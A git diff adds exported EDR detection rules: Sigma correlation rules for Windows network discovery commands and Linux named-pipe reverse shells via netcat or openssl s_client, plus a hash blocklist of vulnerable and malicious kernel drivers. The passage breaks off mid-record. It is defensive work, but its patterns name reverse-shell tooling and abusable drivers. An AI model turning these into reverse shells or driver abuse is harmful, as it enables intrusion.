+ "rule_description": "Detects the execution of commands to retrieve information about network connections.\nAttackers may use it during the discovery phase to display information about the system.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
+ "rule_creation_date": "2025-10-20",
+ "rule_modified_date": "2026-01-21",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.discovery"
+ ],
+ "rule_technique_tags": [
+ "attack.t1033",
+ "attack.t1049"
+ ],
+ "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7",
+ "declared_in": null,
+ "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9"
+}
+{
+ "id": "eed7ad50-c4a6-476b-b3b8-c8570d32b537",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_dependencies": [],
+ "rule_is_depended_on": [],
+ "inner_sigma": [
+ {
+ "id": "d885a69a-230a-40fb-ac5a-0c215fe11e32",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Net Use Executed",
+ "creation_date": "2025-10-17",
+ "modified_date": "2026-01-21",
+ "description": "Detects the execution of the 'net use' command on a Windows system, which is used to display shared network resources.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ },
+ {
+ "id": "007eb20f-51e0-4032-a8b3-c02ad63835d2",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Netstat Executed",
+ "creation_date": "2025-10-17",
+ "modified_date": "2026-01-21",
+ "description": "Detects the execution of the 'netstat' command on a Windows system, which is used to display active network connections, listening ports, and network statistics.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ },
+ {
+ "id": "ed109dd2-26c1-4664-bb63-b23ede14f0ee",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Net Sessions Executed",
+ "creation_date": "2025-10-17",
+ "modified_date": "2026-01-21",
+ "description": "Detects the execution of the 'net sessions' command on a Windows system, which displays information about active sessions on the local computer, including connected users and their resources.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ }
+ ],
+ "inner_correlation": [],
+ "inner_rule_counts": {
+ "sigma": 3,
+ "correlation": 0
+ },
+ "rule_type": "correlation",
+ "is_valid": true,
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:27.713488Z",
+ "creation_date": "2026-03-23T11:45:27.713491Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:27.713497Z",
+ "silent": false,
+ "rule_level": "medium",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery",
+ "https://attack.mitre.org/techniques/T1049/",
+ "https://attack.mitre.org/software/S0039/",
+ "https://attack.mitre.org/software/S0104/"
+ ],
+ "name": "t1049_system_network_connections_discovered_windows.yml",
+ "content": "title: Netstat Executed\nname: cmd_netstat\nid: 007eb20f-51e0-4032-a8b3-c02ad63835d2\ndescription: |\n Detects the execution of the 'netstat' command on a Windows system, which is used to display active network connections, listening ports, and network statistics.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961504(v=ws.11)\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\netstat.exe'\n # Renamed binaries\n - OriginalFileName: 'netstat.exe'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Net Use Executed\nname: cmd_net_use\nid: d885a69a-230a-40fb-ac5a-0c215fe11e32\ndescription: |\n Detects the execution of the 'net use' command on a Windows system, which is used to display shared network resources.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/gg651155(v=ws.11)\n - https://attack.mitre.org/software/S0039/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'net.exe'\n CommandLine:\n - 'net use'\n - 'net.exe use'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Net Sessions Executed\nname: cmd_net_sessions\nid: ed109dd2-26c1-4664-bb63-b23ede14f0ee\ndescription: |\n Detects the execution of the 'net sessions' command on a Windows system, which displays information about active sessions on the local computer, including connected users and their resources.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750729(v=ws.11)\n - https://attack.mitre.org/software/S0039/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'net.exe'\n CommandLine:\n - 'net session'\n - 'net sessions'\n - 'net.exe session'\n - 'net.exe sessions'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: System Network Connections Discovered (Windows)\nid: eed7ad50-c4a6-476b-b3b8-c8570d32b537\ndescription: |\n Detects the execution of commands to retrieve information about network connections.\n Attackers may use it during the discovery phase to display information about the system.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0039/\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/17\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0039\n - attack.s0104\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\ncorrelation:\n type: combination\n platform: windows\n rules:\n - cmd_netstat\n - cmd_net_use\n - cmd_net_sessions\n group-by:\n - processes\n processes:\n MyProcess: created.parent\n related-process: MyProcess\n timespan: 2s\n condition: cmd_netstat and cmd_net_use and cmd_net_sessions\nlevel: medium\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "warnings": null,
+ "errors": null,
+ "rule_id": "eed7ad50-c4a6-476b-b3b8-c8570d32b537",
+ "rule_name": "System Network Connections Discovered (Windows)",
+ "rule_description": "Detects the execution of commands to retrieve information about network connections.\nAttackers may use it during the discovery phase to display information about the system.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
+ "rule_creation_date": "2025-10-17",
+ "rule_modified_date": "2026-01-21",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.discovery"
+ ],
+ "rule_technique_tags": [
+ "attack.t1049"
+ ],
+ "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7",
+ "declared_in": null,
+ "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9"
+}
+{
+ "id": "fc9663c5-b88d-487a-98b3-421c01431987",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_dependencies": [],
+ "rule_is_depended_on": [],
+ "inner_sigma": [
+ {
+ "id": "478b012d-d794-48ee-962c-a584c48967fd",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "FIFO File Created",
+ "creation_date": "2026-01-09",
+ "modified_date": "2026-01-09",
+ "description": "Detects the execution of mkfifo or mknod.\nBoth utilities can be used to create FIFO files, a special type of file that allows inter-process communication, where one process writes data while another process reads it simultaneously.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "linux",
+ "can_block": true
+ },
+ {
+ "id": "e26f81a0-a730-425d-842c-175578204937",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "OpenSSL Execution",
+ "creation_date": "2026-01-09",
+ "modified_date": "2026-01-09",
+ "description": "Detects the use of OpenSSL to establish encrypted TLS/SSL connections to remote hosts.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "linux",
+ "can_block": true
+ },
+ {
+ "id": "fe05b782-a2d0-4976-b92c-33ad9fda178f",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Netcat Execution",
+ "creation_date": "2026-01-09",
+ "modified_date": "2026-01-09",
+ "description": "Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "linux",
+ "can_block": true
+ }
+ ],
+ "inner_correlation": [],
+ "inner_rule_counts": {
+ "sigma": 3,
+ "correlation": 0
+ },
+ "rule_type": "correlation",
+ "is_valid": true,
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:27.713568Z",
+ "creation_date": "2026-03-23T11:45:27.713570Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:27.713575Z",
+ "silent": false,
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
+ "https://attack.mitre.org/techniques/T1059/004/",
+ "https://attack.mitre.org/techniques/T1071/001/"
+ ],
+ "name": "t1059_004_named_pipe_reverse_shell.yml",
+ "content": "title: FIFO File Created\nname: fifo_file_created\nid: 478b012d-d794-48ee-962c-a584c48967fd\ndescription: |\n Detects the execution of mkfifo or mknod.\n Both utilities can be used to create FIFO files, a special type of file that allows inter-process communication, where one process writes data while another process reads it simultaneously.\nreferences:\n - https://linux.die.net/man/1/mkfifo\n - https://threatpost.com/mitel-voip-bug-exploited/180079/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2026/01/09\nmodified: 2026/01/09\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_mkfifo:\n Image|endswith: '/mkfifo'\n\n selection_mknod:\n Image|endswith: '/mknod'\n CommandLine|endswith: ' p'\n\n condition: 1 of selection_*\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Netcat Execution\nname: netcat\nid: fe05b782-a2d0-4976-b92c-33ad9fda178f\ndescription: |\n Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\nreferences:\n - https://www.varonis.com/blog/netcat-commands\ndate: 2026/01/09\nmodified: 2026/01/09\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/netcat'\n - '/ncat'\n - '/nc'\n - '/nc.openbsd'\n - '/nc.traditional'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: OpenSSL Execution\nname: openssl\nid: e26f81a0-a730-425d-842c-175578204937\ndescription: |\n Detects the use of OpenSSL to establish encrypted TLS/SSL connections to remote hosts.\nreferences:\n - https://attack.mitre.org/techniques/T1057/\n - https://attack.mitre.org/software/S0057/\ndate: 2026/01/09\nmodified: 2026/01/09\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'openssl*s_client'\n - 's_client*-connect*'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Named Pipe Reverse Shell Execution\nid: fc9663c5-b88d-487a-98b3-421c01431987\ndescription: |\n Detects the execution of shell commands used to create reverse shells through the use of named pipes (FIFO files).\n Such command patterns commonly leverage utilities like openssl or netcat to establish interactive remote access, potentially allowing attackers to control a compromised system while evading traditional network-based detections.\n It is recommended to investigate the process that ran this commands and its execution context to determine if this action was legitimate.\nreferences:\n - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2026/01/09\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.RemoteShell\ncorrelation:\n type: combination\n platform: linux\n rules:\n - fifo_file_created\n - netcat\n - openssl\n group-by:\n - processes\n processes:\n ParentProcess: created.parent\n related-process: ParentProcess\n timespan: 5s\n condition: fifo_file_created and (netcat or openssl)\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "warnings": null,
+ "errors": null,
+ "rule_id": "fc9663c5-b88d-487a-98b3-421c01431987",
+ "rule_name": "Named Pipe Reverse Shell Execution",
+ "rule_description": "Detects the execution of shell commands used to create reverse shells through the use of named pipes (FIFO files).\nSuch command patterns commonly leverage utilities like openssl or netcat to establish interactive remote access, potentially allowing attackers to control a compromised system while evading traditional network-based detections.\nIt is recommended to investigate the process that ran this commands and its execution context to determine if this action was legitimate.\n",
+ "rule_creation_date": "2026-01-09",
+ "rule_modified_date": "2026-01-23",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.command_and_control",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1059.004",
+ "attack.t1071.001"
+ ],
+ "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7",
+ "declared_in": null,
+ "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9"
+}
diff --git a/harfang_export/driver_blocklist_export.json b/harfang_export/driver_blocklist_export.json
new file mode 100644
index 0000000..2dc0c25
--- /dev/null
+++ b/harfang_export/driver_blocklist_export.json
@@ -0,0 +1,245854 @@
+{
+ "id": "00055d75-c4ca-5c5b-8eb0-cf1ae8fbeae4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820302Z",
+ "creation_date": "2026-03-23T11:45:30.820304Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820309Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ffa2791abaa004489427b2c187b64db87b49aaa0ffb2e576f0c982dbe62c62a",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "000a28de-7145-5411-8498-d995fafff2e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603951Z",
+ "creation_date": "2026-03-23T11:45:29.603954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.603965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4222e186d23160c29fe2bdf163d29561139eae8484d081457e7278872d7e9e2",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0010a7ec-4038-52d2-bafd-8951fd0da80c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467985Z",
+ "creation_date": "2026-03-23T11:45:30.467989Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81237053f6eeaf659970e9e5e7abba00261ec2b850b1f5b195d0888f8ce66d6f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0016849f-5781-5d69-9677-55ab9fae5c65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462956Z",
+ "creation_date": "2026-03-23T11:45:30.462959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcb774b6f6ff504d2db58096601bc5cb419c169bfbeaa3af852417e87d9b2aa0",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "001cbe83-97a2-5162-a1dc-71a584661ffd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149097Z",
+ "creation_date": "2026-03-23T11:45:31.149100Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c7c17c77cadbedc05bd2cb988dd3f654fd7b43899a949ec1d63d07ede6570c4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "002e82a9-97d5-50ea-987d-429045a2b609",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609736Z",
+ "creation_date": "2026-03-23T11:45:29.609738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609744Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce23c2dae4cca4771ea50ec737093dfafac06c64db0f924a1ccbbf687e33f5a2",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0031c4f5-a44b-5b66-8741-0c4516e658c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967920Z",
+ "creation_date": "2026-03-23T11:45:29.967922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b348190c2991baec9cdda808187712c205dbf0f3f6178b3c68bc9b13bb0d3bfe",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00373a0f-2ca7-5e52-aa17-4ddb36b93d42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811681Z",
+ "creation_date": "2026-03-23T11:45:31.811683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e37f4c077ae36294772acc7d23084d1ef5ab5e293974b1a872a5b18fb85f873a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "003c2e1b-9e06-598e-b9fa-2cd73aef37b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967401Z",
+ "creation_date": "2026-03-23T11:45:29.967403Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3e8ea5e593176f9e66c17f6a200fa665c7ef409c97f49aadf5a55ad6b0be97e",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "003c8069-8d1a-50ee-b5e8-afcaee6796a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828931Z",
+ "creation_date": "2026-03-23T11:45:30.828933Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4a65f4671a6fd29d5e212dfd0e87011bc969ed3d3a72ac8f0b24a20be9a8b5d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00499fd4-be3f-5abf-ba9d-b5a26e40514d",
